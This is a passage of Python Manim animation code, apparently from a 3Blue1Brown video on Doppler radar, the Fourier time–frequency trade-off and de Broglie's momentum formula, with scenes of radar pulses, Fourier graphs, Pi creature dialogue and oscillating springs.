dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequenies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequenies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
shifted_graphs.move_to, fourier_graph, DOWN,
)
self.wait()
self.play(shifted_graphs.restore),
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequenies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = 0.025,
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]),
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8,
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.5,
"lag_ratio" : 0.7,
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
def get_wave():
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
return
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
bezier([0, 1, 0, 1])
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
def update_springs(springs):
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
